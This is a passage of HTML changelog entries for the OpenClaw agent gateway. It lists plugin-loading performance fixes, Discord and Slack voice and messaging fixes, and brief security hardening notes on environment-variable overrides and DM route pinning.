<p>Agents/runtime: reuse the Gateway metadata startup plan when ensuring reply runtime plugins are loaded, so live agent turns do not broad-load plugin runtimes after the Gateway already scoped startup activation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: delegate scoped reply runtime registry reuse to the plugin loader cache-key compatibility checks, so config changes with the same startup plugin ids cannot keep stale runtime hooks or tools active. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: let compatible wider plugin registries satisfy scoped reply runtime requests when they already contain the requested plugins, avoiding redundant runtime loading without bypassing loader cache-key freshness checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: validate agent model allowlists against manifest model catalog metadata during reply startup, avoiding broad provider runtime catalog loading before the agent run lane starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: keep allowlisted configured model thinking metadata available when manifest catalog rows are absent, so explicit high-reasoning levels remain valid for custom configured models. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: preserve plugin-declared config-only generation providers such as local Comfy workflows during reply tool pre-gating, and share manifest auth/config availability checks between the planner and final tool factories. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep Comfy generation tools visible from legacy local workflow config and cloud API-key config when no Gateway metadata snapshot is active, using plugin-declared manifest signals instead of loading provider runtimes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: route media and generation capability lookups through the Gateway plugin metadata snapshot during reply tool registration, avoiding repeated manifest registry reloads on the live reply path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: let plugins declare media generation auth aliases and base-url guards in manifests, preserving OpenAI Codex OAuth image generation availability without core-owned provider special cases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: reuse the auth profile store already loaded for the active run when deciding media and generation tool availability, avoiding repeated provider-auth runtime discovery during reply startup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep image, video, and music generation tool registration on manifest/auth control-plane checks instead of loading runtime provider registries during reply startup, reducing live-path tool-prep blocking while leaving provider runtime resolution for execution and list actions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</p>
</li>
<li>
<p>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</p>
</li>
<li>
<p>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</p>
</li>
<li>
<p>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</p>
</li>
<li>
<p>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</p>
</li>
<li>
<p>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</p>
</li>
<li>
<p>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</p>
</li>
<li>
<p>Discord/voice: leave Discord voice off for text-only configs unless <code>channels.discord.voice</code> is explicitly configured, avoiding default <code>GuildVoiceStates</code> traffic and idle gateway CPU pressure for bots that do not use <code>/vc</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>. Thanks @sanchezm86 and @SecureCloudProjO.</p>
</li>
<li>
<p>Discord/voice: rerun configured voice auto-join after Discord gateway RESUMED events and ignore already-destroyed stale voice connections during reconnect cleanup, so health-monitor account restarts can rejoin configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>. Thanks @liz709.</p>
</li>
<li>
<p>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: lengthen the default voice join Ready wait, add configurable <code>voice.connectTimeoutMs</code>/<code>voice.reconnectGraceMs</code>, and warn before destroying unrecovered disconnected sessions so slow Discord voice handshakes and reconnects no longer fail silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @darealgege, @kzicherman, and @ayochim.</p>
</li>
<li>
<p>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</p>
</li>
<li>
<p>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</p>
</li>
<li>
<p>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: merge configured media-understanding providers such as Deepgram into partial active provider registries, so follow-up voice turns keep transcribing after another media plugin is already active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>. Thanks @OneMintJulep.</p>
</li>
<li>
<p>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</p>
</li>
<li>
<p>Discord/voice: apply per-channel Discord <code>systemPrompt</code> overrides to voice transcript turns by forwarding the trusted channel prompt through the voice agent run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>. Thanks @qearlyao.</p>
</li>
<li>
<p>Discord/native commands: send component-only interaction replies from slash command and status handlers instead of treating renderable Discord components as an empty response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/slash commands: send block-only slash command replies instead of dropping Slack block payloads with no plain-text fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram/messages: derive fallback text from interactive button/select labels before sending button-only payloads, so Telegram replies are not rejected as empty messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>LINE/messages: send quick-reply-only payloads with fallback option text instead of accepting the payload and returning an empty delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</p>
</li>
<li>
<p>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool and asks for spoken reply text, so <code>/vc join</code> sessions synthesize and play agent replies instead of ending with <code>NO_REPLY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>. Thanks @aounakram.</p>
</li>
<li>
<p>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</p>
</li>
<li>
<p>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</p>
</li>
<li>
